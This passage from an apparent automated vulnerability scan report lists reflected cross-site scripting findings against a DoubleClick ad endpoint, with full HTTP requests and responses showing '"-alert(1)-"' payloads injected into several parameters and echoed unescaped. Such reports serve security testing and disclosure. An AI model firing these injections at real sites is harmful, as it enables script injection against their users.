GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA622a9"-alert(1)-"8932fa1c614&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:21:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
NETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA622a9"-alert(1)-"8932fa1c614&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.
...[SNIP]...

6.21. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [gen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the gen request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4559"-alert(1)-"a80ed9f51c6 was submitted in the gen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=c4559"-alert(1)-"a80ed9f51c6&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:23:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
ThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=c4559"-alert(1)-"a80ed9f51c6&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-L0-Opto");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

6.22. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [os parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the os request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5564d"-alert(1)-"eaf42eb733c was submitted in the os parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=5564d"-alert(1)-"eaf42eb733c&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:23:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7570

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
jBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=5564d"-alert(1)-"eaf42eb733c&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-L0-Discrete");
var fscUrl = url;
...[SNIP]...

6.23. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [refurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2234"-alert(1)-"26d8569ff18 was submitted in the refurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=c2234"-alert(1)-"26d8569ff18&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:22:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7570

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
MXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=c2234"-alert(1)-"26d8569ff18&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.j
...[SNIP]...

6.24. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [reqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the reqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1c5"-alert(1)-"99f47f07abd was submitted in the reqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY5f1c5"-alert(1)-"99f47f07abd&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:21:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7570

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY5f1c5"-alert(1)-"99f47f07abd&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=N
...[SNIP]...

6.25. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 349f7"-alert(1)-"99747f8916f was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=349f7"-alert(1)-"99747f8916f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7480
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:23:49 GMT
Expires: Sun, 24 Apr 2011 16:23:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
iu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=349f7"-alert(1)-"99747f8916fhttp://www.newark.com/jsp/bespoke/bespoke7.jsp?bespokepage=common/en/technology-first/whats-new/whats-new.jsp&CMP=BAN-NPI_np");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opa
...[SNIP]...

6.26. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2a53"-alert(1)-"e40a3ea8abb was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.phpb2a53"-alert(1)-"e40a3ea8abb&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
